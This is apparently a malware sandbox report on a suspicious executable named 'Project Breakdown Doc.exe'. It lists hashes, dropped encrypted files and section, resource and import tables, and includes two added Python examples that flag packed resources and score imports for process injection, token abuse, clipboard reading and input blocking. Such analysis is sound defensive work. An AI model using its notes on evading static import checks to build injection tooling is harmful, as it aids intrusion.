• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• VT rate limit hit for: Project Breakdown Doc.exe
Time      Type             Description
06:42:34  API Interceptor  10297x Sleep call for process: powercfg.exe modified
Process: C:\Windows\SysWOW64\powercfg.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\Project Breakdown Doc.exe
File Type: data
Category: dropped
Size (bytes): 289792
Entropy (8bit): 7.995252499439571
Encrypted: true
SSDEEP: 6144:9qw8PRneE2gwmloAJWmKDw4kt7QyelNyERxeZsMgUkEf:9qw85pZV2AJQkiyelYMMgUkEf
MD5: 1C8E5B6F9CEA547A6BFF401F911104AC
SHA1: 964AD4D5FFCCBA0BAA1FDC644559D2BC16B7946C
SHA-256: 9F5DD0DE8BA6C85E9EC3573217FE074A8011B2879E562859ADF4E1A39839928A
SHA-512: 9D1BB11DF2DFF681BE708BED0BA213286ADF830284B87540FD9AF45CDE7D37C5C6C22894C4189C75D2EBAC11B6D7FDB10293A3D7EC3E6428012094AC23DC0BE1
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\Project Breakdown Doc.exe
File Type: data
Category: dropped
Size (bytes): 289792
Entropy (8bit): 7.995252499439571
Encrypted: true
SSDEEP: 6144:9qw8PRneE2gwmloAJWmKDw4kt7QyelNyERxeZsMgUkEf:9qw85pZV2AJQkiyelYMMgUkEf
MD5: 1C8E5B6F9CEA547A6BFF401F911104AC
SHA1: 964AD4D5FFCCBA0BAA1FDC644559D2BC16B7946C
SHA-256: 9F5DD0DE8BA6C85E9EC3573217FE074A8011B2879E562859ADF4E1A39839928A
SHA-512: 9D1BB11DF2DFF681BE708BED0BA213286ADF830284B87540FD9AF45CDE7D37C5C6C22894C4189C75D2EBAC11B6D7FDB10293A3D7EC3E6428012094AC23DC0BE1
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.201416370556976
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Project Breakdown Doc.exe
File size: 1'368'576 bytes
MD5: bf7d24a56c64e6632ff2ca51f08908f8
SHA1: 428d664141dc9d2318dacdf51c4ac9efbbdd3847
SHA256: ade930428485f335d9ab8526b0073be5cdf902c7316bf24bf86c69c85ed67d7e
SHA512: dfbecaf21a3c59b0d3248dfb8fb603a321d2fa358d15466143a25ea907014b60182c70caa6395f3a0f0e24fe7662447431df00b8e628b3f50a8a4c4e73d66b2b
SSDEEP: 24576:OAHnh+eWsN3skA4RV1Hom2KXMmHa56GGVDLhD1vJVs9JAMu3E5:5h+ZkldoPK8Ya56GGx4bAM3
TLSH: A955CF42A3D28031FFAB92335B66BB25567F7D699433951F12883C74BDB11B2123E623
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
Icon Hash: 3121090929212160
Entrypoint: 0x42800a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673F1DEF [Thu Nov 21 11:47:59 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
                                                Instruction
                                                call 00007FB004EBD89Dh
                                                jmp 00007FB004EB0654h
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                push edi
                                                push esi
                                                mov esi, dword ptr [esp+10h]
                                                mov ecx, dword ptr [esp+14h]
                                                mov edi, dword ptr [esp+0Ch]
                                                mov eax, ecx
                                                mov edx, ecx
                                                add eax, esi
                                                cmp edi, esi
                                                jbe 00007FB004EB07DAh
                                                cmp edi, eax
                                                jc 00007FB004EB0B3Eh
                                                bt dword ptr [004C41FCh], 01h
                                                jnc 00007FB004EB07D9h
                                                rep movsb
                                                jmp 00007FB004EB0AECh
                                                cmp ecx, 00000080h
                                                jc 00007FB004EB09A4h
                                                mov eax, edi
                                                xor eax, esi
                                                test eax, 0000000Fh
                                                jne 00007FB004EB07E0h
                                                bt dword ptr [004BF324h], 01h
                                                jc 00007FB004EB0CB0h
                                                bt dword ptr [004C41FCh], 00000000h
                                                jnc 00007FB004EB097Dh
                                                test edi, 00000003h
                                                jne 00007FB004EB098Eh
                                                test esi, 00000003h
                                                jne 00007FB004EB096Dh
                                                bt edi, 02h
                                                jnc 00007FB004EB07DFh
                                                mov eax, dword ptr [esi]
                                                sub ecx, 04h
                                                lea esi, dword ptr [esi+04h]
                                                mov dword ptr [edi], eax
                                                lea edi, dword ptr [edi+04h]
                                                bt edi, 03h
                                                jnc 00007FB004EB07E3h
                                                movq xmm1, qword ptr [esi]
                                                sub ecx, 08h
                                                lea esi, dword ptr [esi+08h]
                                                movq qword ptr [edi], xmm1
                                                lea edi, dword ptr [edi+08h]
                                                test esi, 00000007h
                                                je 00007FB004EB0835h
                                                bt esi, 03h
                                                Programming Language:
                                                • [ASM] VS2013 build 21005
                                                • [ C ] VS2013 build 21005
                                                • [C++] VS2013 build 21005
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                • [ASM] VS2013 UPD5 build 40629
                                                • [RES] VS2013 build 21005
                                                • [LNK] VS2013 UPD5 build 40629
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xbc0cc          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc8000          0x83ad8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x14c000         0x7134        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x92bc0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa4b50          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8f000          0x884         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x8dfdd       0x8e000   310e36668512d53489c005622bb1b4a9  False     0.5735602580325704   data       6.675248351711057   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8f000          0x2fd8e       0x2fe00   748cf1ab2605ce1fd72d53d912abb68f  False     0.32828818537859006  data       5.763244005758284   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xbf000          0x8f74        0x5200    aae9601d920f07080bdfadf43dfeff12  False     0.1017530487804878   data       1.1963819235530628  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xc8000          0x83ad8       0x83c00   2e6d95daed950489ad786eb3efd58cb7  False     0.8648804405834914   data       7.657876470096671   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x14c000         0x7134        0x7200    f04128ad0f87f42830e4a6cdbc38c719  False     0.7617530153508771   data       6.783955557128661   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size     Type                                                                                      Language  Country        ZLIB Complexity
RT_ICON        0xc8548   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192                           English   Great Britain  0.7466216216216216
RT_ICON        0xc8670   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors      English   Great Britain  0.3277027027027027
RT_ICON        0xc8798   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192                           English   Great Britain  0.3885135135135135
RT_ICON        0xc88c0   0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5905 x 5905 px/m    English   Great Britain  0.47606382978723405
RT_ICON        0xc8d28   0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5905 x 5905 px/m    English   Great Britain  0.4120544090056285
RT_ICON        0xc9dd0   0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5905 x 5905 px/m    English   Great Britain  0.37572614107883817
RT_ICON        0xcc378   0x4228   Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5905 x 5905 px/m  English   Great Britain  0.36254133207368916
RT_ICON        0xd05a0   0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5905 x 5905 px/m English   Great Britain  0.339701880988998
RT_ICON        0xe0dc8   0x16c88  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                               English   Great Britain  0.998692670381483
RT_MENU        0xf7a50   0x50     data                                                                                      English   Great Britain  0.9
RT_STRING      0xf7aa0   0x594    data                                                                                      English   Great Britain  0.3333333333333333
RT_STRING      0xf8034   0x68a    data                                                                                      English   Great Britain  0.2747909199522103
RT_STRING      0xf86c0   0x490    data                                                                                      English   Great Britain  0.3715753424657534
RT_STRING      0xf8b50   0x5fc    data                                                                                      English   Great Britain  0.3087467362924282
RT_STRING      0xf914c   0x65c    data                                                                                      English   Great Britain  0.34336609336609336
RT_STRING      0xf97a8   0x466    data                                                                                      English   Great Britain  0.3605683836589698
RT_STRING      0xf9c10   0x158    Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                          English   Great Britain  0.502906976744186
RT_RCDATA      0xf9d68   0x51809  data                                                                                      (none)    (none)         1.0003325015801314
RT_GROUP_ICON  0x14b574  0x5a     data                                                                                      English   Great Britain  0.7888888888888889
RT_GROUP_ICON  0x14b5d0  0x14     data                                                                                      English   Great Britain  1.25
RT_GROUP_ICON  0x14b5e4  0x14     data                                                                                      English   Great Britain  1.15
RT_GROUP_ICON  0x14b5f8  0x14     data                                                                                      English   Great Britain  1.25
RT_VERSION     0x14b60c  0xdc     data                                                                                      English   Great Britain  0.6181818181818182
RT_MANIFEST    0x14b6e8  0x3ef    ASCII text, with CRLF line terminators                                                    English   Great Britain  0.5074478649453823
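The two columns that matter for triage in the section and resource tables above are Entropy and ZLIB Complexity: .rsrc carries an entropy of 7.66 against 5.76 for .rdata, and the 0x51809-byte RT_RCDATA blob (the only resource without a language tag) has a ZLIB Complexity of 1.0003, i.e. zlib could not shrink it at all. The 0x14-byte RT_GROUP_ICON entries at 1.25 and 1.15 (20 raw bytes becoming 25 or 23) indicate that the column is the zlib-compressed size divided by the raw size, so a value at or above 1.0 means the bytes were already compressed or encrypted. The following added example, not part of the Joe Sandbox report, recomputes both measures over constructed byte buffers; the column definition and the 7.2 / 0.95 flagging thresholds are this example's assumptions.

```python
"""Added example: recompute per-section / per-resource Entropy and ZLIB Complexity
over constructed buffers and flag the packed/encrypted-looking one."""
import math
import random
import zlib


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Assumed definition of the report column: zlib-compressed size / raw size.
    Already-compressed or encrypted bytes come out >= 1.0 because zlib only adds
    its own framing (header, stored-block headers, Adler-32 trailer)."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def triage(name: str, data: bytes,
           entropy_threshold: float = 7.2,
           complexity_threshold: float = 0.95) -> dict:
    """Flag a section or resource whose bytes look packed or encrypted.
    The thresholds are this example's assumptions, not the sandbox's."""
    ent = shannon_entropy(data)
    cpx = zlib_complexity(data)
    return {
        "name": name,
        "size": len(data),
        "entropy": round(ent, 3),
        "zlib_complexity": round(cpx, 4),
        "suspicious": ent >= entropy_threshold and cpx >= complexity_threshold,
    }


def _pseudo_random_bytes(n: int, seed: int = 2024) -> bytes:
    """Deterministic stand-in for an encrypted payload (seeded, so tests repeat)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed inputs (not bytes taken from the sample):
#   TEXT_LIKE   resembles a string table / .rdata
#   ZERO_PADDED resembles a mostly-empty .data section
#   RANDOM_BLOB resembles an encrypted RCDATA payload
TEXT_LIKE = (b"This program cannot be run in DOS mode.\r\n" * 200
             + b"kernel32.dll\0user32.dll\0advapi32.dll\0" * 100)
ZERO_PADDED = b"\x01\x00\x00\x00" * 64 + b"\x00" * 20000
RANDOM_BLOB = _pseudo_random_bytes(0x10000)

SAMPLE_BLOBS = {
    ".rdata-like": TEXT_LIKE,
    ".data-like": ZERO_PADDED,
    "RT_RCDATA-like": RANDOM_BLOB,
}


def triage_all(blobs: dict = SAMPLE_BLOBS) -> list:
    """Run the check over every constructed blob; only the random one should trip it."""
    return [triage(name, data) for name, data in blobs.items()]


if __name__ == "__main__":
    for row in triage_all():
        print(row)
```

On a real file the same two functions are run over each section's raw bytes and each resource's data; a resource that is large, language-less and incompressible, as RT_RCDATA is here, is the first thing to carve out and inspect separately.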
DLL           Imports
WSOCK32.dll   WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll   GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll     timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll  ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll       WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll   InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL     GetProcessMemoryInfo
IPHLPAPI.DLL  IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll   DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll   IsThemeActive
KERNEL32.dll  DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll    AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll     StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll  GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll  GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll   DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll     CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll  LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
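Two things stand out when reading the import table above as a capability list. First, KERNEL32 supplies the write half of a process-injection chain (OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateToolhelp32Snapshot, Process32FirstW/NextW) but no execution primitive: CreateRemoteThread, QueueUserAPC, NtQueueApcThread and SetThreadContext are all absent, while GetProcAddress together with LoadLibraryA/W/ExW is present, so any of those can be resolved at run time and a purely static import score is only a lower bound. Second, for an interpreter stub such as a compiled AutoIt executable the import table belongs to the interpreter runtime (which is why BlockInput, keybd_event, mouse_event, SendInput, WNetAddConnection2W, IcmpSendEcho and CreateProcessWithLogonW all appear side by side) and describes what the runtime can do, not what the embedded script does. The added example below, not code from the Joe Sandbox report, encodes that reasoning as rules; the capability names, the API groupings and the SAMPLE_IMPORTS subset (copied from the table above) are this example's own choices.

```python
"""Added example: score an import table against capability rules and keep
'complete chain' distinct from 'write-only chain with runtime resolution'."""

# Rule model (this example's assumption): every API in `all_of` must be imported
# and, when `any_of` is non-empty, at least one of those must be imported too.
CAPABILITY_RULES = {
    "remote process memory write": {
        "all_of": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"},
        "any_of": set(),
    },
    "remote code execution primitive": {
        "all_of": set(),
        "any_of": {"CreateRemoteThread", "QueueUserAPC", "NtQueueApcThread",
                   "SetThreadContext", "NtCreateThreadEx", "RtlCreateUserThread"},
    },
    "process enumeration": {
        "all_of": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
        "any_of": set(),
    },
    "run as another user": {
        "all_of": set(),
        "any_of": {"CreateProcessAsUserW", "CreateProcessWithLogonW", "LogonUserW"},
    },
    "token manipulation": {
        "all_of": {"OpenProcessToken", "AdjustTokenPrivileges", "LookupPrivilegeValueW"},
        "any_of": set(),
    },
    "input blocking / synthetic input": {
        "all_of": set(),
        "any_of": {"BlockInput", "SendInput", "keybd_event", "mouse_event"},
    },
    "clipboard read": {
        "all_of": {"OpenClipboard", "GetClipboardData"},
        "any_of": set(),
    },
    "HTTP client": {
        "all_of": {"InternetOpenW", "HttpOpenRequestW", "HttpSendRequestW"},
        "any_of": set(),
    },
    "runtime API resolution": {
        "all_of": {"GetProcAddress"},
        "any_of": {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExW"},
    },
}


def flatten_imports(import_table: dict) -> set:
    """{dll: [api, ...]} -> set of API names; the DLL is irrelevant for the rules."""
    return {api for apis in import_table.values() for api in apis}


def evaluate(import_table: dict) -> dict:
    """Return, per capability, whether it is fully present plus what matched/missed."""
    apis = flatten_imports(import_table)
    result = {}
    for cap, rule in CAPABILITY_RULES.items():
        missing_all = rule["all_of"] - apis
        any_hit = rule["any_of"] & apis
        any_ok = not rule["any_of"] or bool(any_hit)
        missing = sorted(missing_all)
        if not any_ok:
            missing.append("one of " + "|".join(sorted(rule["any_of"])))
        result[cap] = {
            "present": not missing_all and any_ok,
            "matched": sorted((rule["all_of"] & apis) | any_hit),
            "missing": missing,
        }
    return result


def injection_verdict(import_table: dict) -> str:
    """Write primitives without an execution primitive are only a lower bound
    when the binary can also resolve APIs at run time."""
    r = evaluate(import_table)
    write = r["remote process memory write"]["present"]
    execute = r["remote code execution primitive"]["present"]
    dynamic = r["runtime API resolution"]["present"]
    if write and execute:
        return "full injection chain imported"
    if write and dynamic:
        return "memory write imported; execution primitive may be resolved at runtime"
    if write:
        return "memory write imported; no execution primitive"
    return "no injection indicators in imports"


# Constructed subset of the import table above (names exactly as listed there).
SAMPLE_IMPORTS = {
    "KERNEL32.dll": ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory",
                     "ReadProcessMemory", "VirtualFreeEx", "CreateToolhelp32Snapshot",
                     "Process32FirstW", "Process32NextW", "CreateThread", "ResumeThread",
                     "GetProcAddress", "LoadLibraryA", "LoadLibraryW", "LoadLibraryExW",
                     "IsDebuggerPresent", "CreateProcessW"],
    "USER32.dll": ["BlockInput", "SendInput", "keybd_event", "mouse_event",
                   "OpenClipboard", "GetClipboardData", "GetAsyncKeyState"],
    "ADVAPI32.dll": ["OpenProcessToken", "AdjustTokenPrivileges", "LookupPrivilegeValueW",
                     "DuplicateTokenEx", "CreateProcessAsUserW",
                     "CreateProcessWithLogonW", "LogonUserW"],
    "WININET.dll": ["InternetOpenW", "InternetConnectW", "HttpOpenRequestW",
                    "HttpSendRequestW", "InternetReadFile"],
}

if __name__ == "__main__":
    for cap, info in evaluate(SAMPLE_IMPORTS).items():
        print(f"{cap:36s} present={info['present']!s:5s} missing={info['missing']}")
    print(injection_verdict(SAMPLE_IMPORTS))
```

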